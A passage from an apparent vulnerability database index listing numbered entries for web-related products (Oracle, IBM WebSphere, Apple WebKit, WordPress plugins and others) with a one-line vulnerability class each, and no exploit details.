disclosure [83459] Oracle WebCenter Content Content Server unspecified [83458] Oracle WebCenter Sites WebCenter Sites HTTP header injection [83457] Oracle WebCenter Content Content Server denial of service [83456] Oracle WebCenter Capture Import Server denial of service [83454] Oracle WebLogic Server WebLogic Console unspecified [83453] Oracle WebLogic Server WebLogic Console unspecified [83452] Oracle WebCenter Interaction Image Service unspecified [83451] Oracle WebCenter Content Content Server unspecified [83449] Oracle COREid Access WebGate - WebServer plugin unspecified [83448] Oracle HTTP Server Web Listener denial of service [83446] Oracle Web Services Manager Web Services Security unspecified [83426] KNet Web Server string buffer overflow [83402] Free Monthly Websites file_io.php security bypass [83377] RESTful Web Services module for Drupal page cache denial of service [83319] MiniWeb filename parameter directory traversal [83318] MiniWeb unspecified file upload [83310] PowerTCP WebServer for ActiveX denial of service [83286] TinyWebGallery image.php path disclosure [83244] C2 WebResource fileview.asp cross-site scripting [83208] Feedweb plugin for WordPress widget_remove.php cross-site scripting [83205] Sophos Web Appliance cross-site scripting [83204] Sophos Web Appliance directory traversal [83203] Sophos Web Appliance command execution [83182] Portal Web Services download_file.php response splitting [83181] Portal Web Services contact.php cross-site scripting [83173] RuggedCom Rugged Operating System Web API security bypass [83150] RoundCube Webmail index.php file include [83138] IBM WebSphere Application Server Web2.0 and mobile toolkit cross-site scripting [83128] IBM Sterling Secure Proxy Web content spoofing [83115] Moodle WebDav repository multiple security bypass [83114] KNet Web Server string SEH buffer overflow [83113] Atmail WebMail index.php cross-site scripting [83083] Microsoft SharePoint and Microsoft Office Web Apps privilege escalation [83057] Moodle WebDav repository lib.php information disclosure [83053] PowerHawk 6320 meter web-based UI information disclosure [83042] Splunk Web component unspecified cross-site scripting [82991] RESTful Web Services module for Drupal HTTP request cross-site request forgery [82968] askiaweb pgHistory.asp and pgadmin.asp scripts SQL injection [82967] askiaweb AskiaExt.dll file cross-site scripting [82954] Linux Kernel netlink interface information disclosure [82942] Siemens SIMATIC WinCC TIA Portal HMI's web application cross-site scripting [82931] Multiple NEC Aterm routers web-based management utility cross-site request forgery [82905] Siemens Simatic WinCC Web server directory traversal [82850] Apple WebKit CVE-2013-0961 code execution [82849] Apple WebKit CVE-2013-0960 code execution [82829] TIBCO Spotfire Web Player unspecified security bypass [82828] TIBCO Spotfire Web Player unspecified cross-site scripting [82762] IBM WebSphere Portal Web Content Manager cross-site scripting [82760] IBM WebSphere Application Server directory traversal [82759] IBM WebSphere Application Server security bypass [82737] Web Cookbook searchrecipe.php cross-site scripting [82736] Web Cookbook searchrecipe.php and showtext.php scripts SQL injection [82697] IBM WebSphere Application Server cross-site scripting [82696] IBM WebSphere Application Server denial of service [82695] IBM WebSphere Application Server SSL security bypass [82651] Google Chrome WebKit code execution [82570] Google Chrome Web Audio implementation code execution [82541] IBM WebSphere Commerce information disclosure [82507] WebCalendar username information disclosure [82501] Websense TRITON Unified Security Center web security module denial of service [82500] Websense TRITON Unified Security Center web security module cross-site scripting [82499] Websense TRITON Unified Security Center web security SQL injection [82498] Websense TRITON Unified Security Center pages security bypass [82497] Websense TRITON Unified Security Center web security security bypass [82360] Apache HTTP Server manager interface cross-site scripting [82356] webfs webfsd.log information disclosure [82355] SkunkWeb sw.log information disclosure [82349] Rix4Web add-site.php SQL injection [82337] Dell PowerConnect interface denial of service [82314] EasyWebScripts eBay Clone Script signinform.php CRLF injection [82313] EasyWebScripts eBay Clone Script lostpassword.php, showcategory.php and signinform.php scripts cross-site scripting [82311] EasyWebScripts eBay Clone Script gallery.php, product_desc.php and showcategory.php scripts SQL injection [82275] Google Chrome web audio node code execution [82252] Web Cookbook dumpdb.php directory traversal [82250] Web Cookbook currid parameter SQL injection [82233] IBM InfoSphere Information Server Web console cross-site scripting [82221] IBM WebSphere DataPower Appliance echo web service cross-site scripting [82184] Mozilla Firefox, Thunderbird, and SeaMonkey WebIDL code execution [82174] Stoneware webNetwork multiple scripts cross-site scripting [82057] Dell SonicWALL Scrutinizer fa_web.cgi scripts SQL injection [82036] Roundcube Webmail data and vbscript URLs cross-site scripting [81975] Puppet Administrator user interface cross-site request forgery [81869] Opera Web browser SVG code execution [81854] IBM Lotus Domino webadmin.nsf cross-site request forgery [81853] IBM Lotus Domino webadmin.nsf cross-site scripting [81839] Free Monthly Websites add_main_pages.php file upload [81838] Free Monthly Websites index.php, login.php and file_io.php scripts security bypass [81742] D-Link DCS Web Cameras docmd.htm command execution [81739] D-Link DCS Web Cameras configuration file security bypass [81733] SAP NetWeaver Web Application Server information disclosure [81698] Cisco Network Admission Control Web authentication function cross-site scripting [81693] Samba Samba Web Administration Tool cross-site request forgery [81689] Opera Web Browser unspecified [81569] Apple WebKit CVE-2013-0951 code execution [81568] Apple WebKit CVE-2013-0958 code execution [81566] Apple WebKit CVE-2013-0950 code execution [81565] Apple WebKit CVE-2013-0956 code execution [81564] Apple WebKit CVE-2013-0953 code execution [81563] Apple WebKit CVE-2013-0959 code execution [81561] Apple WebKit CVE-2013-0948 code execution [81560] Apple WebKit CVE-2013-0968 code execution [81559] Apple WebKit CVE-2013-0954 code execution [81558] Apple WebKit CVE-2013-0955 code execution [81556] Apple WebKit CVE-2013-0949 code execution [81555] Apple WebKit CVE-2013-0962 cross-site scripting [81554] Apple WebKit CVE-2013-0952 code execution [81548] IBM WebSphere Application Server WS-Security spoofing [81539] PHPWeby Free Directory Script options.php cross-site request forgery [81538] PHPWeby Free Directory Script contact.php SQL injection [81526] Cisco WebEx Social search information disclosure [81503] Weboptima loginPass.php security bypass [81502] Weboptima upload.php file upload [81481] IBM InfoSphere Master Data Management Web content spoofing [81477] SUSE WebYaST Hosts List information disclosure [81471] Perforce P4Web multiple cross-site scripting [81465] GE Proficy HMI/SCADA - CIMPLICITY CimWebServer command execution [81464] GE Proficy HMI/SCADA - CIMPLICITY CimWeb directory traversal [81440] myu-s and PHP WeblogSystem unspecified cross-site scripting [81425] Adult Webmaster Script information disclosure [81406] Cisco WebEx recordings security bypass [81404] Cisco WebEx reservations security bypass [81390] Cisco WebEx Social cross-site scripting [81389] Cisco WebEx Training Center testingLibraryAction.do cross-site request forgery [81367] DELL SonicWALL interface code execution [81366] DELL SonicWALL GMS/Analyzer/ViewPoint interface security bypass [81345] Barracuda Web Application Firewall unspecified cross-site scripting [81291] Oracle Siebel CRM Highly Interactive Web UI information disclosure [81267] Oracle Enterprise Manager User Interface Framework unspecified [81251] Oracle Access Manager OAM Webgate unspecified [81225] Apache CouchDB Futon user interface cross-site scripting [81216] IBM Tivoli Storage Manager Web GUI authentication unauthorized access [81149] WeBid validate.php SQL injection [81114] GE Proficy HMI/SCADA - CIMPLICITY CimWebServer.exe denial of service [81062] IBM WebSphere Message Broker wsdl support cross-site scripting [81061] IBM WebSphere Cast Iron Solution LDAP security bypass [81057] Webimage imagemane.php file upload [81056] Concert Calendar add-on for WebsiteBaker view.php SQL injection [81051] Concert Calendar add-on for WebsiteBaker view.php cross-site scripting [81050] Advantech WebAccess HMI/SCADA Software gAddNew.asp cross-site scripting [81016] IBM WebSphere Application Server servlet security bypass [81015] IBM WebSphere Application Server Admin Console VMM cross-site scripting [81014] IBM WebSphere Application Server Admin Console portlet cross-site request forgery [81013] IBM WebSphere Application Server Admin Console type cross-site scripting [81012] IBM WebSphere Application Server Admin Console login cross-site scripting [80969] IBM Tivoli Endpoint Manager Web Reports cross-site scripting [80962] Simple Webserver webserver directory traversal [80957] Opera WebP image information disclosure [80810] EMC Data Protection Advisor Web UI directory traversal [80806] Novell iPrint Client op-client-interface-version code execution [80788] Oracle Sun GlassFish Web Space Server Liferay component directory traversal [80755] Kiwi Syslog Web Access multiple SQL injection [80670] IBM Cognos TM1 Web multiple cross-site scripting [80667] IBM WebSphere Message Broker DataFlowEngine denial of service [80666] IBM WebSphere Message Broker message authentication bypass [80629] IBM TRIRIGA Web content spoofing [80613] Snare for Linux interface cross-site request forgery [80604] Snare for Linux interface information disclosure [80603] Snare for Linux interface cross-site scripting [80593] RumahWeb config.xml file disclosure [80590] Cisco DPC2420 interface cross-site scripting [80578] Red Hat Certificate System interface cross-site scripting [80559] KENT-WEB ACCESS REPORT unspecified cross-site scripting [80558] KENT-WEB ACCESS REPORT unspecified cross-site scripting [80537] IBM Tivoli Application Dependency Discovery Manager Welcome.do Web content spoofing [80536] IBM Netezza Platform Software Web content spoofing [80515] Google Chrome OS WebGL subsystem buffer overflow [80464] PPLWebFinal plugin for WordPress proxyjobrestaurant.php file include [80461] Fortinet FortiWeb multiple cross-site scripting [80451] N-central main web cross-site request forgery [80441] OurWebFTP index.php cross-site scripting [80431] Webplayer theme for WordPress playlist.php SQL injection [80418] TimelineJS_Nuweb plugin for WordPress get_posts_json.php file include [80406] McAfee Email Gateway Secure Web Delivery Client cross-site scripting [80405] McAfee Email Gateway Secure Web Delivery Client security bypass [80394] Webmail Plus module for Drupal unspecified SQL injection [80345] Horde Groupware Webmail Edition and IMP compose-dimp.js cross-site scripting [80331] Google Web Toolkit unspecified cross-site scripting [80276] Incomedia Website X5 Evolution checkaccess.php security bypass [80275] Incomedia Website X5 Evolution imsearch.php cross-site scripting [80257] Zingiri Web Shop plugin for WordPress ajaxfilemanager.php file upload [80253] Beat Websites page_detail.php SQL injection [80250] Webplayer plugin for WordPress config.php SQL injection [80243] AionWeb swfupload_f8.swf cross-site scripting [80238] Websense proxy filter security bypass [80208] BIGACE Web CMS session hijacking [80206] IBM WebSphere Commerce password information disclosure [80185] Mozilla Firefox, Thunderbird, and SeaMonkey webgl bufferdata integer overflow [80154] Opera Web browser error pages information disclosure [80153] Opera Web browser HTTP responses buffer overflow [80144] WeBid settings.php cross-site scripting [80143] WeBid sell.php cross-site request forgery [80140] WeBid loader.php directory traversal [80121] Splunk Splunk Web component cross-site scripting [80120] Splunk Splunk Web component cross-site scripting [80081] RESTful Web Services module for Drupal HTTP request cross-site request forgery [80072] WebKit WebCore security bypass [80063] IBM WebSphere Datapower XC10 administrative function access denial of service [80062] IBM WebSphere DataPower XC10 administrative privilege escalation [79961] Webform CiviCRM Integration module for Drupal contact data security bypass [79937] Weberknecht SSL spoofing [79921] IBM WebSphere DataPower XC10 Appliance spoofing [79920] IBM WebSphere MQ queue manager denial of service [79914] Amazon Web Services SDK SSL spoofing [79894] IcedTea-Web Plugin applet buffer overflow [79876] MD-WEBMARKETING exibe.php cross-site scripting [79875] MD-WEBMARKETING exibe.php and detalhes.php SQL injection [79854] Agile FleetCommander and FleetCommander Kiosk interface cross-site request forgery [79853] Agile FleetCommander and FleetCommander Kiosk Web page cross-site scripting [79828] Opera Web browser unspecified [79827] Opera Web browser SVG code execution [79826] Opera Web browser unspecified [79825] Opera Web Browser Data URIs cross-site scripting [79824] Opera Web browser CORS security bypass [79804] Change Passwords module for Webmin real name parameter cross-site scripting [79745] Apple Safari WebKit SVG code execution [79735] IBM WebSphere Commerce Web Services framework denial of service [79722] Google Web Toolkit unspecified cross-site scripting [79691] Microsoft .NET Framework Web proxy code execution [79666] libunity-webapps code execution [79656] Easy Webinar plugin for WordPress wid SQL injection [79598] IBM WebSphere Application Server WASReqURL cross-site request forgery [79570] Akiva WebBoard information disclosure [79569] libsocialweb flickr server man-in-the-middle [79566] WebTitan logs-x.php directory traversal [79565] WebTitan tools.php command execution [79564] WebTitan login-x.php and urls-x.php SQL injection [79541] IBM WebSphere Application Server Liberty Profile cross-site scripting [79539] IBM WebSphere Application Server Liberty Profile security bypass [79330] Oracle Agile PLM Framework Web Client (CS) unspecified [79317] Oracle WebCenter Sites ImagePicker unspecified [79314] Oracle Imaging and Process Management Web information disclosure [79313] Oracle Imaging and Process Management Web information disclosure [79312] Oracle Imaging and Process Management Web unspecified [79311] Oracle Imaging and Process Management Web unspecified [79310] Oracle Imaging and Process Management Web information disclosure [79307] Oracle Imaging and Process Management Web denial of service [79306] Oracle Imaging and Process Management Web unspecified [79305] Oracle Imaging and Process Management Web unspecified [79303] Oracle WebCenter Sites Advanced UI SQL injection [79302] Oracle WebCenter Sites Advanced UI cross-site request forgery [79301] Oracle WebCenter Sites accounts security bypass [79300] Oracle Imaging and Process Management Web unspecified [79299] Oracle Business Intelligence webapp cross-site scripting [79257] k5n WebCalendar multiple scripts cross-site scripting [79233] IBM Lotus Domino Web server cross-site scripting [79232] IBM Lotus Domino Web server open redirect [79209] Multiple Mozilla products WebSockets code execution [79203] FileBound FileBound Web service privilege escalation [79195] Basic Webmail moduel for Drupal information disclosure [79191] Basic Webmail module for Drupal email messages cross-site scripting [79189] Basic Webmail module for Drupal page title cross-site scripting [79188] Basic Webmail module for Drupal email address information disclosure [79184] Cisco WebEx Player buffer overflow [79183] Cisco WebEx Player buffer overflow [79182] Cisco WebEx Player code execution [79181] Cisco WebEx Player buffer overflow [79180] Cisco WebEx Player buffer overflow [79179] Cisco WebEx Player buffer overflow [79169] Logica Hotscan SWIFT Alliance Interface TCP buffer overflow [79099] Web Help Desk multiple cross-site scripting [79059] MyWebSearch unspecified cross-site scripting [79049] SAP Netweaver Mobile Infrastructure Web Console cross-site scripting [79031] JBoss Web Services CBC information disclosure [79015] PowerTCP WebServer for ActiveX denial of service [78969] Novell GroupWise interfaces directory traversal [78956] jigbrowser+ for Andriod WebView information disclosure [78949] SilverStripe PageCommentInterface.php code execution [78914] IBM WebSphere Portal directory traversal [78889] Roundcube Webmail email subject cross-site scripting [78867] IBM WebSphere Commerce personal data information disclosure [78831] Google Chrome CVE-2012-2896 integer overflow in WebGL [78726] IBM Rational Business Developer Web services information disclosure [78725] Apple iOS WebKit CVE-2012-3747 code execution [78688] Moodle lib.php web-service token security bypass [78677] Cisco Secure Desktop WebLaunch code execution [78674] Cisco Identity Services Engine (ISE) Administrator user interface cross-site request forgery [78640] webERP WorkOrderEntry.php SQL injection [78639] FreeWebshop setlang.php cross-site scripting [78638] FreeWebshop index.php SQL injection [78628] PayPal Website Payments Standard Module for osCommerce unspecified security bypass [78601] GroupWise Internet Agent (GWIA) HTTP interface code execution [78599] Novell GroupWise WebAccess merge parameter cross-site scripting [78579] PacketFence web_node_register() code execution [78577] WAGO I/O System Web Based Management default password [78576] Webmin show.cgi cross-site request forgery [78574] Websense V10000 large file denial of service [78573] Websense V10000 denial of service [78572] Websense Email Security Rules Service denial of service [78571] Websense Email Security Receive Service security bypass [78570] Websense Web Security and Web Filter Filtering Service denial of service [78569] Cybozu KUNAI for Android WebView information disclosure [78568] KUNAI Browser for Remote Service beta WebView information disclosure [78560] Apple iTunes WebKit CVE-2012-3699 code execution [78559] Apple iTunes WebKit CVE-2012-3704 code execution [78558] Apple iTunes WebKit CVE-2012-3602 code execution [78557] Apple iTunes WebKit CVE-2012-3703 code execution [78556] Apple iTunes WebKit CVE-2012-3607 code execution [78555] Apple iTunes WebKit CVE-2012-3648 code execution [78554] Apple iTunes WebKit CVE-2012-3677 code execution [78553] Apple iTunes WebKit CVE-2012-3623 code execution [78552] Apple iTunes WebKit CVE-2012-3711 code execution [78551] Apple iTunes WebKit CVE-2012-3675 code execution [78550] Apple iTunes WebKit CVE-2012-3709 code execution [78549] Apple iTunes WebKit CVE-2012-3712 code execution [78548] Apple iTunes WebKit CVE-2012-3654 code execution [78547] Apple iTunes WebKit CVE-2012-3617 code execution [78546] Apple iTunes WebKit CVE-2012-3643 code execution [78545] Apple iTunes WebKit CVE-2012-3624 code execution [78544] Apple iTunes WebKit CVE-2012-3658 code execution [78543] Apple iTunes WebKit CVE-2012-3706 code execution [78542] Apple iTunes WebKit CVE-2012-3685 code execution [78541] Apple iTunes WebKit CVE-2012-3700 code execution [78540] Apple iTunes WebKit CVE-2012-3632 code execution [78539] Apple iTunes WebKit CVE-2012-3673 code execution [78538] Apple iTunes WebKit CVE-2012-3688 code execution [78537] Apple iTunes WebKit CVE-2012-3705 code execution [78536] Apple iTunes WebKit CVE-2012-3621 code execution [78535] Apple iTunes WebKit CVE-2012-3651 code execution [78534] Apple iTunes WebKit CVE-2012-3598 code execution [78533] Apple iTunes WebKit CVE-2012-3622 code execution [78532] Apple iTunes WebKit CVE-2012-3616 code execution [78531] Apple iTunes WebKit CVE-2012-3606 code execution [78530] Apple iTunes WebKit CVE-2012-3660 code execution [78529] Apple iTunes WebKit CVE-2012-3687 code execution [78528] Apple iTunes WebKit CVE-2012-3657 code execution [78527] Apple iTunes WebKit CVE-2012-3601 code execution [78526] Apple iTunes WebKit CVE-2012-3649 code execution [78525] Apple iTunes WebKit CVE-2012-3676 code execution [78524] Apple iTunes WebKit CVE-2012-3708 code execution [78523] Apple iTunes WebKit CVE-2012-3613 code execution [78522] Apple iTunes WebKit CVE-2012-3702 code execution [78521] Apple iTunes WebKit CVE-2012-3692 code execution [78520] Apple iTunes WebKit CVE-2012-3707 code execution [78519] Apple iTunes WebKit CVE-2012-3710 code execution [78518] Apple iTunes WebKit CVE-2012-3647 code execution [78517] Apple iTunes WebKit CVE-2012-3684 code execution [78516] Apple iTunes WebKit CVE-2012-3672 code execution [78515] Apple iTunes WebKit CVE-2012-3659 code execution [78514] Apple iTunes WebKit CVE-2012-3701 code execution [78513] Apple iTunes WebKit CVE-2012-3614 code execution [78512] Apple iTunes WebKit CVE-2012-3652 code execution [78511] Apple iTunes WebKit CVE-2012-3671 code execution [78510] Apple iTunes WebKit CVE-2012-3612 code execution [78473] Roundcube Webmail email signature cross-site scripting [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting [78450] Websense Email Security security bypass [78449] Websense Email Security information disclosure [78447] McAfee Host Data Loss Prevention Web Post information disclosure [78438] Webify photo gallery file deletion [78437] Webify business directory file deletion [78436] Webify edownloads cart file deletion [78420] Weblinks component for Joomla! index.php SQL injection [78404] Siemens Simatic WinCC WebNavigator cross-site scripting [78401] Webify post file deletion [78380] Honeywell HMIWeb Browser ActiveX control buffer overflow [78346] Websense Web Security and Web Filter ISAPI Filter plug-in security bypass [78345] Websense Web Security and Web Filter Filtering Service denial of service [78344] Websense Web Security and Web Filter Remote Filtering security bypass [78343] Websense Web Security and Web Filter Remote Filtering component denial of service [78342] Websense Web Security and Web Filter flag information disclosure [78341] Websense Web Security and Web Filter URL denial of service [78335] Barracuda Web Filter Authentication Services Listing module cross-site scripting [78320] Webmin edit_html.cgi directory traversal [78319] Webmin show.cgi command execution [78317] Webmin edit_mon.cgi and save_mon.cgi code execution [78309] web@all CMS index.php file include [78308] web@all CMS upload_json.php and cls_upload.php file upload [78299] Websense Enterprise Filtering Service security bypass [78281] Wiki Web Help links.php file include [78273] Websense Web Security Investigative Reports command execution [78251] RoundCube Webmail unspecified input cross-site scripting [78225] Cybozu Live for Android WebView information disclosure [78131] Websense Email Security SMTP information disclosure [78129] McAfee Email and Web Security Appliance and McAfee Email Gateway Console/Dashboard cross-site scripting [78128] McAfee Email and Web Security Appliance and McAfee Email Gateway URL session hijacking [78127] McAfee Email and Web Security Appliance and McAfee Email Gateway URL information disclosure [78119] HD Webplayer plugin for WordPress multiple SQL injection [78109] Mozilla Firefox and Thunderbird Web console code execution [78097] Mozilla Firefox, Thunderbird, and SeaMonkey WebGLshaders code execution [78050] Simple Web Server HTTP header buffer overflow [78047] IBM WebSphere Application Server and WebSphere Virtual Enterprise proxy server denial of service [78032] Symantec Messaging Gateway management interface security bypass [78028] Wiki Web Help multiple cross-site scripting [78020] MediaSpan Website Management searchresults.asp cross-site scripting [78019] Web Wiz Forums ForumID and ThreadPage parameters cross-site scripting [77991] WebPA index.php security bypass [77989] WebPA readfile.php file upload [77979] McAfee Email and Web Security unspecified cross-site scripting [77977] McAfee Email and Web Security session ID security bypass [77964] GWebmail Subject and Name parameters cross-site scripting [77963] Websense Content Gateway m_overview.ink cross-site scripting [77959] IBM WebSphere Application Server PM44303 security bypass [77936] web@all CMS index.php SQL injection [77935] web@all CMS action.php cross-site scripting [77934] web@all CMS action.php and index.php cross-site scripting [77897] WeBid contents.php SQL injection [77896] WeBid loader.php file include [77895] WeBid getthumb.php directory traversal [77861] GWebmail module parameter file include [77857] T-dah Webmail addressbook.php cross-site request forgery [77856] IlohaMail Webmail e-mail body and bookmarks cross-site scripting [77854] Hupa Webmail e-mail subject and e-mail body cross-site scripting [77850] Uebimiau Webmail multiple cross-site scripting [77849] Zingiri Web Shop plugin for WordPress index.php SQL injection [77827] Promocion Web index.php SQL injection [77798] Roundcube Webmail e-mail body field cross-site scripting [77697] IBM Websphere Application Server CBIND security bypass [77675] Apple WebKit CVE-2012-3690 drag and drop information disclosure [77647] Apple WebKit CVE-2012-3592 code execution [77646] Apple WebKit CVE-2012-3668 code execution [77645] Apple WebKit CVE-2012-3681 code execution [77644] Apple WebKit CVE-2012-3596 code execution [77643] Apple WebKit CVE-2012-3639 code execution [77642] Apple WebKit CVE-2012-0682 code execution [77641] Apple WebKit CVE-2012-3604 code execution [77640] Apple WebKit CVE-2012-3669 code execution [77639] Apple WebKit CVE-2012-3680 code execution [77638] Apple WebKit CVE-2012-0683 code execution [77637] Apple WebKit CVE-2012-3696 WebSockets HTTP header injection [77636] Apple WebKit CVE-2012-3594 code execution [77635] Apple WebKit CVE-2012-3693 IDN spoofing [77634] Apple WebKit CVE-2012-3667 code execution [77633] Apple WebKit CVE-2012-3611 code execution [77632] Apple WebKit CVE-2012-3638 code execution [77631] Apple WebKit CVE-2012-3656 code execution [77630] Apple WebKit CVE-2012-3670 code execution [77629] Apple WebKit CVE-2012-3603 code execution [77627] Apple WebKit CVE-2012-3615 code execution [77626] Apple WebKit CVE-2012-3610 code execution [77624] Apple WebKit CVE-2012-3691 security bypass [77623] Apple WebKit CVE-2012-3618 code execution [77622] Apple WebKit CVE-2012-3627 code execution [77621] Apple WebKit CVE-2012-3641 code execution [77620] Apple WebKit CVE-2012-3694 filesystem path information disclosure [77619] Apple WebKit CVE-2012-3626 code execution [77618] Apple WebKit CVE-2012-3650 SVG file information disclosure [77617] Apple WebKit CVE-2012-3695 cross-site scripting [77616] Apple WebKit CVE-2012-3655 code execution [77615] Apple WebKit CVE-2012-3646 code execution [77614] Apple WebKit CVE-2012-3595 code execution [77613] Apple WebKit CVE-2012-3663 code execution [77612] Apple WebKit CVE-2012-3683 code execution [77611] Apple WebKit CVE-2012-3697 [77610] Apple WebKit CVE-2012-3591 code execution [77609] Apple WebKit CVE-2012-3633 code execution [77608] Apple WebKit CVE-2012-3599 code execution [77607] Apple WebKit CVE-2012-3609 code execution [77606] Apple WebKit CVE-2012-3593 code execution [77605] Apple WebKit CVE-2012-3679 code execution [77604] Apple WebKit CVE-2012-1520 code execution [77603] Apple WebKit CVE-2012-3640 code execution [77602] Apple WebKit CVE-2012-3589 code execution [77601] Apple WebKit CVE-2012-3665 code execution [77600] Apple WebKit CVE-2012-3666 code execution [77599] Apple WebKit CVE-2012-3631 code execution [77598] Apple WebKit CVE-2012-3597 code execution [77597] Apple WebKit CVE-2012-3653 code execution [77596] Apple WebKit CVE-2012-3678 code execution [77595] Apple WebKit CVE-2012-3644 code execution [77594] Apple WebKit CVE-2012-3630 code execution [77593] Apple WebKit CVE-2012-3645 code execution [77592] Apple WebKit CVE-2012-3686 code execution [77591] Apple WebKit CVE-2012-3642 code execution [77590] Apple WebKit CVE-2012-3628 code execution [77589] Apple WebKit CVE-2012-3636 code execution [77588] Apple WebKit CVE-2012-3629 code execution [77587] Apple WebKit CVE-2012-3637 code execution [77586] Apple WebKit CVE-2012-3682 code execution [77585] Apple WebKit CVE-2012-3625 code execution [77584] Apple WebKit CVE-2012-3634 code execution [77583] Apple WebKit CVE-2012-3689 same origin policy bypass [77582] Apple WebKit CVE-2012-3590 code execution [77581] Apple WebKit CVE-2012-3605 code execution [77580] Apple WebKit CVE-2012-3674 code execution [77579] Apple WebKit CVE-2012-3635 code execution [77578] Apple WebKit CVE-2012-3661 code execution [77577] Apple WebKit CVE-2012-3608 code execution [77576] Apple WebKit CVE-2012-3600 code execution [77575] Apple WebKit CVE-2012-3664 code execution [77574] Apple WebKit CVE-2012-3620 code execution [77534] Dir2web3 index.php SQL injection [77533] Dir2web3 information disclosure [77509] Inout Webmail New Mail and Contacts module cross-site scripting [77505] Mibew Web Messenger threadprocessor.php SQL injection [77503] WinWebMail Server sendMail function cross-site scripting [77500] T-dah Webmail sendMail function cross-site scripting [77478] IBM WebSphere Application Server authentication cache weak security [77477] IBM WebSphere Application Server application file directory traversal [77476] IBM Websphere Application Server ISC console session hijacking [77473] Cisco IOS local web denial of service [77455] Cisco Adaptive Security Appliances WebVPN denial of service [77404] WebPage Test resultimage.php file upload [77390] IcedTea-Web Plugin strings code execution [77389] The IcedTea-Web Plugin pointer code execution [77382] IBM WebSphere Commerce personalization ID denial of service [77338] Google Chrome WebP decoder buffer overflow [77334] Google Chrome WebUI renderer information disclosure [77333] Google Chrome webRequest interference unspecified [77302] Dr. Web Enterprise Security Suite login page cross-site scripting [77294] IBM WebSphere Commerce REST services framework security bypass [77279] IBM WebSphere MQ SVRCONN channel security bypass [77264] Symantec Web Gateway deptUploads_data.php SQL injection [77180] IBM WebSphere MQ File Transfer Edition cross-site request forgery [77179] IBM WebSphere Application Server Administration Console cross-site scripting [77140] SimpleWebServer HTTP header buffer overflow [77134] Oxide WebServer character denial of service [77131] OSIsoft PI OPC DA Interface OPC message buffer overflow [77116] Symantec Web Gateway ldap_latest.php SQL injection [77115] Symantec Web Gateway console security bypass [77114] Symantec Web Gateway console command execution [77113] Symantec Web Gateway authentication mechanism file include [77112] Symantec Web Gateway blocked.php SQL injection [77111] Symantec Web Gateway console command execution [77095] IBM WebSphere MQ File Transfer Edition Web Gateway security bypass [77058] Oracle iPlanet Web Server Web Server denial of service [77033] Oracle Siebel CRM Web UI unspecified [76974] Dr.Web Anti-virus for Android information disclsoure [76953] Yahoo! Browser for Android WebView Class information disclosure [76931] WebsiteBaker example.php cross-site scripting [76930] web@all name parameter cross-site scripting [76914] WebPagetest delete.php file deletion [76913] WebPagetest download.php file download [76912] WebPagetest about.php file include [76911] WebPagetest dopublish.php, resultimage.php and workdone.php file upload [76910] WebPagetest file parameter directory traversal [76803] WebsitePanel ReturnUrl open redirect [76799] IBM WebSphere MQ user id denial of service [76783] Eclydre Web Manager upload.php file upload [76779] WordPress FlexiWeb-Form plugin upload_img.php file upload [76774] Webmatic Referer: parameter SQL injection [76768] Webify Link Directory index.php SQL injection [76687] Zingiri Web Shop plugin for WordPress download.php File Include [76665] Novell GroupWise WebAccess directory traversal [76656] SpecView Web Server web request directory traversal [76643] webERP PathPrefix parameter file include [76641] webERP index.php file include [76603] Cisco WebEx Player audio data buffer overflow [76602] Cisco WebEx Player WRF memory code execution [76601] Cisco WebEx Player JPEG WRF buffer overflow [76600] Cisco WebEx Player WRF file buffer overflow [76599] Cisco WebEx Player ARF code execution [76575] Symantec Message Filter interface information disclosure [76572] Symantec Message Filter management interface cross-site scripting [76571] Symantec Message Filter management interface cross-site request forgery [76543] WD ShareSpace Network Storage Sytem WEB GUI config.xml information disclosure [76539] IMP Webmail Client SVG cross-site scripting [76534] Apache Roller weblog cross-site scripting [76478] web@all CMS search.php cross-site scripting [76477] web@all CMS action.php cross-site request forgery [76465] Cisco AnyConnect Secure Mobility Client WebLaunch code execution [76459] Juniper Networks Mobility System Software web portal WebAAA wba_login.html cross-site scripting [76434] IBM WebSphere MQ server message channel agent denial of service [76427] WEB PATIO unspecified cross-site scripting [76426] WEB PATIO unspecified cross-site scripting [76421] WEBO Site SpeedUp wss_lang parameter file include [76420] WEBO Site SpeedUp index.php file include [76382] Webify Web Products index.php cross-site scripting [76371] Webify Web Products index.php file include [76363] Opera WebGL denial of service [76321] Zingiri Web Shop plugin for WordPress uploadfilexd.php file upload [76318] TinyWebGalelry selitems[] and searchitem parameters cross-site scripting [76316] TinyWebGallery index.php code execution [76315] TinyWebGallery unspecified cross-site request forgery [76273] Quest Webthority unspecified cross-site request forgery [76262] Bradford Network Sentry interface cross-site request forgery [76239] Oracle Java WebStart BasicService.showDocument() code execution [76224] Bloxx Web Filtering Microdasys cross-site request forgery [76216] Webspell dailyinput Movie-Addon index.php SQL injection [76186] HP Web Jetadmin unspecified cross-site scripting [76164] Webspell FIRSTBORN Movie-Addon index.php SQL injection [76137] RoundCube Webmail image cross-site scripting [76109] Siemens WinCC DiagAgent web server denial of service [76090] ATWEB ShoppingCart unspecified cross-site scripting [76018] MiniWeb Content-Length header denial of service [76010] Bloxx Web Filtering X-Forwarded-For HTTP header injection [76009] Bloxx Web Filtering backup configuration file information disclosure [76008] Bloxx Web Filtering multiple scripts cross-site scripting [76007] Bloxx Web Filtering multiple cross-site request forgery [75999] Simple Web Content Management System multiple scripts SQL injection [75916] WhyWeb property.php and hom001.php SQL injection [75734] Tornado tornado.web.RequestHandler.set_header() function HTTP response splitting [75732] Symantec Web Gateway file download [75731] Symantec Web Gateway file include [75730] Symantec Web Gateway unspecified command execution [75706] Epicor Returns Management SOAP interface SQL injection [75674] WEB MART Internet Explorer CSS expressions cross-site scripting [75673] WEB MART crafted Cookies cross-site scripting [75666] 3D Life Player WebPlayer ActiveX control buffer overflow [75624] Zingiri Web Shop plugin for WordPress Stock management module SQL injection [75623] Zingiri Web Shop plugin for WordPress connect.php and admin.php cross-site scripting [75585] NTDS Web Studio pacotes.php SQL injection [75584] IBM WebSphere Portal Dojo module directory traversal [75583] Vallarta Web Services realestate_listings.php SQL injection [75482] Schneider Electrics Telecontrol Kerwin and Kerweb searching cross-site scripting [75474] Apple Safari WebKit state tracking security bypass [75431] Apple iOS WebKit code execution [75428] Kerweb and Kerwin multiple cross-site scripting [75407] Cisco Unified MeetingPlace Web component SQL injection [75381] Fortinet Fortiweb security bypass [75380] Symantec Web Gateway timer.php cross-site scripting [75356] Websense TRITON ws_irpt.exe command execution [75353] Websense TRITON favorites.exe cross-site scripting 